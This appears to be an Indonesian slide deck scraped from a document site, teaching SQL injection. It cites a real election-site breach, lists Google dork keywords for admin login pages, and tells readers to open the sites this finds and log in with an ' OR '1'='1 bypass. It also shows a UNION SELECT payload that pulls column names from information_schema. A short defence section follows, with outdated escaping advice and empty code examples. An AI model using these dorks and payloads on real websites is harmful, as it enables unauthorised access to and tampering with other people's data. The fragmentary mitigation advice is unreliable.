Professional Documents
Culture Documents
org
Pengertian :
* sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi
perintah SQL yang ada di memori aplikasi client.
* merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan
database untuk penyimpanan data.
SQL INJECTION
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL
statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
SQL INJECTION
Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU
pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer. Dengan teknik
ini dia dapat masuk sebagai web administrator tanpa susah payah scan port port yang
terbuka , tanpa terdeteksi oleh firewall dan tanpa tool khusus ke situs KPU yang konon
systemnya yang seharga 152 milyar itu keamanannya berlapis lapis.
* Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki
account.
* Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun
menambahkan data–data yang berada didalam database.
* Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak
bisa memberi layanan kepada web server.
Id.wikipedia.org
Langkah-langkah
SQL INJECTION
b. Masukkan keyword :
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
Langkah-langkah
SQL INJECTION
2. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan
menjumpai sebuah halaman login (user name danpassword).
4. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa
menambahkan berita, mengedit user yang lain, merubah about,dan lain-lain. Jika tidak
berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
Langkah-langkah
SQL INJECTION
$username = $_POST['username'];
$password = $_POST['password'];
Sekarang, perhatikan apa yang terjadi apabila dalam form dimasukkan input sebarang
nama user dan password berbentuk ‘ OR ‘1′ = ‘1. Pastilah login akan sukses karena
perintah SQL yang dijalankan adalah :
SELECT * FROM user WHERE username = ‘xxx‘ AND password = ” OR ‘1′ = ‘1′
yang akan selalu menghasilkan nilai TRUE.
Langkah-langkah
SQL INJECTION
1.http://10.103.1.100/inject_sql/index.php?read=viewdat&id=1
Sekilas kalo dilihat tidak terjadi apa2 sekarang kita tambahkan tanda – sebelum 1. maka
pada area SCREENSHOT dan data akan hilang, kemungkinan besar bisa di inject, tapi
ingat tidak semuanya bisa.
http://10.103.1.100/inject_sql/index.php?read=viewdat&id=-
1′%20UNION%20SELECT%20column_name,1,2,3,4,5,6%20from%20information_sche
ma.columns%20where%20table_name=’tuser’%20limit%200,6/*
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode
program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa
diinject dengan perintah yang panjang. Jangan izinkan user menginput selain karakter a –
z atau A – Z atau 0 – 9 , selain dari pada itu ditolak pada saat pengecekan.
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang
berjalan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server
Security tab.
6. Update PHP rilis terbaru yang telah dilengkapi security dengan mengubah karakter
single quote (‘) menjadi (\’). Dengan kata lain karakter single quote yang diinputkan
melalui form secara otomatis akan diubah menjadi backslash-single quote (\’).
1.mysql_escape_string
Contoh : <?php
?>
2. mysql_real_escape_string
Contoh : <?php
?>
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan
kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
Terima kasih